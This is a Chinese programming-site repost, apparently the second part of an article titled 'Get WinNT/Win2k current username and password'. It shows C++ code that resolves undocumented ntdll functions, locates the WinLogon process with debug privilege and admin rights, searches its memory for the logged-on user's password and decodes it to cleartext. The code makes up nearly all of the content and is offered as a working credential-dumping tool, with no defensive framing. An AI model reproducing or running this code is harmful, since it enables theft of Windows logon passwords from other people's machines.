获取WinNT/Win2k当前用户名和密码(2)
2008-02-23 05:38:12来源:互联网 阅读 ()
);pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
GetProcAddress(hNtDll,"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString");
// Locate WinLogon's PID - need debug privilege and admin rights.
DWORD dwWinLogonPID = FindWinLogon ();
if(!dwWinLogonPID)
{
// 很难找到进程WinLogon 或正在使用 NWGINA.DLL
// 导致不能在内存中找到密码
FreeLibrary(hNtDll);
return false;
}
// Format("主进程WinLogon的id是 %d (0x%8.8x).\n",
// ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID))));
// Set values to check memory block against.
memset(wszUserName, 0, sizeof (wszUserName));
memset(wszUserDomain, 0, sizeof (wszUserDomain));
GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400);
GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400);
// Locate the block of memory containing
// the password in WinLogon's memory space.
BOOL bFoundPasswordPage;
//bFoundPasswordPage = FALSE;
if(IsWin2K())
bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen);
else
bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen);
if(bFoundPasswordPage)
{
if(dwPwdLen == 0)
{
// Format("登陆信息为: 域名:%S/密码:%S.\n",
// ARRAYOFCONST((wszUserDomain, wszUserName))));
// 密码长度为空,系统没有密码
}
else
{
// Format("找到了密码,长度为%d\n", ARRAYOFCONST(((int)dwPwdLen))));
// Decode the password string.
if(IsWin2K())
ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd);
else
ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd);
}
}
else
{
FreeLibrary(hNtDll);
return false;
}// 没有在内存中间找到密码
return true;
}
//---------------------------------------------------------------------------
BOOL IsWinNT(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if(GetVersionEx(&OSVersionInfo))
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT);
else
return (FALSE);
}
//---------------------------------------------------------------------------
BOOL IsWin2K(void)
{
OSVERSIONINFO OSVersionInfo;
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (GetVersionEx(&OSVersionInfo))
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT)
&& (OSVersionInfo.dwMajorVersion == 5));
else
return (FALSE);
}
//---------------------------------------------------------------------------
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇: 如何把一个网页存为一个单独的mht文档
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
